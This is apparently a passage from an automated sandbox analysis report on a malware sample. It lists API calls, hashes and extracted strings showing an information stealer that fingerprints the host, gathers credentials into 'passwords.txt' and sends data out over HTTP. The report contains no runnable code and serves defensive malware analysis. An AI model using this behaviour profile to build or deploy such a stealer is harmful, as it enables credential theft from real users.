                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405DAA
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F54
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,0156F8F8,?,015724D8,00000000,00000000,-00400100,00000000), ref: 00405F94
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,004201C1,?,00000000,004201C1,",00000000,004201C1,mode,00000000,004201C1,0156F198,00000000,004201C1,004269D8), ref: 00406392
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063A3
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063AE
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063B5
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063C6
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004063D7
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063E8
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406401
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040640A
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040641D
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00406431
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000000C7,00000000), ref: 00406448
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040649E
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004064A9
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405FBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004064B6
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004064C0
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000000), ref: 00405DCA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
                                                                                                                                                                                                                                                                                                  • String ID: "$"$"$*$------$------$------$------$build_id$mode
                                                                                                                                                                                                                                                                                                  • API String ID: 530647464-3630346487
                                                                                                                                                                                                                                                                                                  • Opcode ID: 089763e1180469b060daa2b051b084847cdfeb38a2f1139273a97ad74b024327
                                                                                                                                                                                                                                                                                                  • Instruction ID: a08b747351f3a96535aba500675343c14e4fcb34faea4da8f047a2726442ef11
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 089763e1180469b060daa2b051b084847cdfeb38a2f1139273a97ad74b024327
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10522D71801149EACB15E7E5C952BEEBBB89F19304F54407EE60173192DF782B4CCAB9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph

[Figure: control-flow graph 852, block 415660-41649f; legend: Executed / Not Executed]
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00427398,00000000,?,00000000,00000000), ref: 004102AE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102A0: HeapAlloc.KERNEL32(00000000,?,00427398,00000000,?,00000000,00000000), ref: 004102B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102A0: GetLocalTime.KERNEL32(00427398,?,00427398,00000000,?,00000000,00000000), ref: 004102C1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102A0: wsprintfA.USER32 ref: 004102ED
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410C30: memset.MSVCRT ref: 00410C55
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410C30: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410C72
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410C30: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410C94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410C30: CharToOemA.USER32(00000000,?), ref: 00410CB2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410CD0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410CE5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410D68
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: GetVolumeInformationA.KERNEL32(00421A29,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410DA1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DED
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: HeapAlloc.KERNEL32(00000000), ref: 00410DF4
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004273D0,00000000,?,00000000,00000000,00000000,00000000), ref: 0041599B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004119C0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 004119DC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004119C0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004119F7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004119C0: CloseHandle.KERNEL32(00000000), ref: 004119FE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410EE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410EF5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410EE0: HeapAlloc.KERNEL32(00000000), ref: 00410EFC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411020: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC,00000000), ref: 00411043
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411020: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4), ref: 00411054
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411020: CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000), ref: 0041106E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411020: CoSetProxyBlanket.OLE32(004273DC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000), ref: 004110A7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411020: VariantInit.OLEAUT32(?), ref: 00411106
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004111E0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 00411203
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004111E0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418), ref: 00411214
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004111E0: CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 0041122E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004111E0: CoSetProxyBlanket.OLE32(00427418,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000), ref: 00411267
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004111E0: VariantInit.OLEAUT32(?), ref: 004112C2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,01562ED0,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410260: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,01562ED0,004184AF), ref: 00410273
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410260: GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,01562F00), ref: 00410247
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: CreateDCA.GDI32(01562F10,00000000,00000000,00000000), ref: 00410BCA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410BD5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410BE0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: ReleaseDC.USER32(00000000,00000000), ref: 00410BEB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415D2A,?,00000000,?,Display Resolution: ,00000000,?,00427448,00000000), ref: 00410BF8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415D2A,?,00000000,?,Display Resolution: ,00000000,?,00427448,00000000,?), ref: 00410BFF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: wsprintfA.USER32 ref: 00410C0F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410370: GetKeyboardLayoutList.USER32(00000000,00000000,0042708F,?,?,00000001), ref: 004103B7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410370: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004103C9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410370: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004103D4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410370: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410370: LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410300: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410311
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410300: HeapAlloc.KERNEL32(00000000), ref: 00410318
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410300: GetTimeZoneInformation.KERNEL32(?), ref: 00410327
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410300: wsprintfA.USER32 ref: 00410352
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004104D0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104E5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004104D0: HeapAlloc.KERNEL32(00000000), ref: 004104EC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004104D0: RegOpenKeyExA.KERNEL32(80000002,0156B410,00000000,00020119,00000000), ref: 0041050B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004104D0: RegQueryValueExA.KERNEL32(00000000,01571D80,00000000,00000000,00000000,000000FF), ref: 00410526
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410580: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004105A2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410580: GetLastError.KERNEL32(?,?,00000001), ref: 004105B0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410580: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004105E8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410580: wsprintfA.USER32 ref: 00410632
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetSystemInfo.KERNEL32(00000000), ref: 0041054D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410563
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410680: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480), ref: 0041068E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410680: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480,00000000), ref: 00410695
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410680: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 004106B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410680: wsprintfA.USER32 ref: 004106DB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004106F0: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410747
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004106F0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 004107D4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410AA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410AEF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410AA0: Process32First.KERNEL32(00000000,00000128), ref: 00410AFF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410AA0: Process32Next.KERNEL32(00000000,00000128), ref: 00410B11
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410AA0: Process32Next.KERNEL32(00000000,00000128), ref: 00410B7E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410AA0: CloseHandle.KERNEL32(00000000), ref: 00410B89
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: RegOpenKeyExA.KERNEL32(00000000,01566098,00000000,00020019,00000000,004270A7,?,00000001), ref: 0041085F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: RegEnumKeyExA.KERNEL32(00000000,?,?,0042750C,00000000,00000000,00000000,00000000,?,?,00000001), ref: 004108BE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: wsprintfA.USER32 ref: 004108E7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410905
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: RegQueryValueExA.KERNEL32(?,01572148,00000000,000F003F,?,00000400), ref: 00410935
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: lstrlen.KERNEL32(?), ref: 0041094A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410800: RegQueryValueExA.KERNEL32(?,015720B8,00000000,000F003F,?,00000400,00000000,004219B1,?,00000000,?,004270D8), ref: 004109CE
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,0042751C,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00416407
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCloseCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                                                                  • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 1864629043-4117839003
                                                                                                                                                                                                                                                                                                  • Opcode ID: b9eb07b7684611d61d0bd3059f479e887a603eaa2ba10f507a7bbd4c1bcea64b
                                                                                                                                                                                                                                                                                                  • Instruction ID: d0cc808f1cb2f816238a06d44e6270940a99662192b5bc88e36d74afc34faa58
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9eb07b7684611d61d0bd3059f479e887a603eaa2ba10f507a7bbd4c1bcea64b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D923F71805149EACB15E7E1C952AEEBBB85F25304F5040BEA602735D2DF7C2B4CCAB9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,0156F048,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040CFC9
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040D026
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040D02D
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000), ref: 0040D0DA
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,0156F758), ref: 0040D0F4
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D107
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A58), ref: 0040D116
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D129
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A5C), ref: 0040D138
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,0156F828), ref: 0040D149
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D15C
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A60), ref: 0040D16B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,0156F7E8), ref: 0040D17B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D18E
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A64), ref: 0040D19D
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,01571FE0), ref: 0040D1AE
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D1C1
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A68), ref: 0040D1D0
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426A6C), ref: 0040D1DF
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF), ref: 0040D217
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D269
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: memcmp.MSVCRT ref: 0040714B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: memset.MSVCRT ref: 00407179
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: LocalAlloc.KERNEL32(00000040,?), ref: 004071B0
                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D299
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                                                                                                                                                                                                                                  • String ID: passwords.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 998505060-347816968
                                                                                                                                                                                                                                                                                                  • Opcode ID: 394aa70c948baad0faa4885fba661abafd2c9501512b629c4db32deb0cf4da0c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 63851fc3274498d7ace03ef38f0d11ae2fd2b8d34633411e4d20ec60dba1fe74
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 394aa70c948baad0faa4885fba661abafd2c9501512b629c4db32deb0cf4da0c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3C18F74D00218EBCB14EBE4DC45AEEBB79BF19304F10452DF612B3291DB786A09CB65
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414638
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413A40: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413AB5
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004146CD
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041480B
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004148A0
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004149EA
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414A8C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414BCA
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414C5F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DA9
